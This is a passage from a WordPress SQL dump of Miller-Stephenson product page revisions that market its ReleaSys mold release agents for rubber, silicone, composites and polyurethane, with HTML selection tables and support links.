up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-12-22 16:51:46', '2016-12-22 16:51:46', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3340, 2, '2016-12-22 16:52:41', '2016-12-22 16:52:41', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1><strong>Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</strong></h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys™ Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys™ mold release products, include <strong>solvent based</strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide For Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-Based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\n[ux_product_categories ids="21" number="10"]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-12-22 16:52:41', '2016-12-22 16:52:41', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3341, 2, '2016-12-22 16:54:40', '2016-12-22 16:54:40', '<hr />\n\n<h3 style="text-align: center;">[share title=""]</h3>\n<h1 style="text-align: center;">High Performance, Specialized Polyurethane Mold Release Agents</h1>\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research, development and technical expertise.  Our mold release agents are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\n<ul>\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\n</ul>\n<h2><span style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\n<ul>\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\n</ul>\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\n<ul>\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\n 	<li><span style="font-size: 105%;">Insulation</span></li>\n</ul>\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\n<ul>\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\n</ul>\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\n<table style="height: 284px;" width="769">\n<tbody>\n<tr>\n<td width="105">\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="153">\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="136">\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\n</td>\n<td width="135">\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\n</td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Satin</span></td>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n<h3>Technical or Application Support:</h3>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n</ul>\n&nbsp;', 'Polyurethane Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2869-autosave-v1', '', '', '2016-12-22 16:54:40', '2016-12-22 16:54:40', '', 2869, 'https://www.miller-stephenson.com/2869-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3342, 2, '2016-12-22 16:55:05', '2016-12-22 16:55:05', '<hr />\r\n\r\n<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1 style="text-align: center;">High Performance, Specialized Polyurethane Mold Release Agents</h1>\r\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research, development and technical expertise.  Our mold release agents are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 105%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: 